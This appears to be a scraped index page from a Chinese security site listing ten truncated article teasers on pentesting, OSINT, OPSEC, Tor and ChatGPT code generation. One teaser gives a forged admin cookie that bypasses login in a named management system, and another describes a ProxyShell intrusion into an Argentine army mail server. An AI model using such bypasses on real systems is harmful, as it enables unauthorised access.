title=='锁群管理系统 V2.0'poc；在任意接口写入默认cookie用以登录绕过Cookie: ASP.NET_SessionId=evadd1jksrepp4gtbgockcbi; username=admin; power=1; powerName=%e8%b6%85%e7%ba%a7%e7%ae%a...

纯真(CZ88.NET)自2005年起一直为广大社区用户提供社区版IP地址库，只要获得纯真的授权就能免费使用，并不断获取后续更新的版本。如果有需要免费版IP库的朋友可以前往纯真的官网进行申请。纯真除...

因为实在太闲所以决定写一点面向新手的文章，多数为我个人的理解，有什么不足的话各位师傅可以指正。1.登录登录处做的好的话一般只有弱口令（例如若依），但是当我们遇到二开系统或是自研系统，...

一，信息收集我们可以借助搜索引擎或是各种平台来对于渗透的目标进行信息收集,信息收集可以用于各种方面,比如获取后台账号，找寻后台地址。还可以用其对于文件以及视频,ip的来源去进行一个溯源...

22年opsec指南有些观点已经过时 inviZible项目,加密dns，ipzeronetX,安卓端对端加密邮件https://zeronet.io/官网IMEI Masker修改imei,root或虚拟机使用原创，转载请标注阻击者联盟

近年来，开源情报 （OSINT）软件正在成为收集公共信息的越来越重要的工具。此类软件允许用户从各种来源（例如搜索引擎、社交媒体资料和政府记录）收集易于访问的个人和组织数据，目的是创建全面...

Exchange邮件系统ProxyShell攻击链复现小记，阿根廷某军队邮服系统渗透实战之前写了关于手法的那个心得，对于如何从中危漏洞到getshell这一块没有举出详细例子解释，最近又遇到了一个阿根廷军队...

ChatGPT 是一种强大的 AI 语言模型，可以根据提示生成人类文本，使其成为各种自然语言处理任务的有用工具正如我之前提到的，其中一项任务是编写代码。所以，我心想，有没有可能只使用 ChatGPT ...

科技的飞速发展，给我们的生活带来的不仅是便利和舒适，也带来了新的威胁。信息安全是风险最高的领域，而这正是安全即服务 （SECaaS） 脱颖而出的地方——一种全面的方法，正在改变关于数据保护...

Tor 是当今使用的最受欢迎的匿名网络之一。它抵御流关联攻击的能力对于提供强大的匿名性保证非常重要。然而，对 Tor 洋葱服务（以前称为“隐藏服务”）进行流关联攻击的可行性仍然是一个悬而未...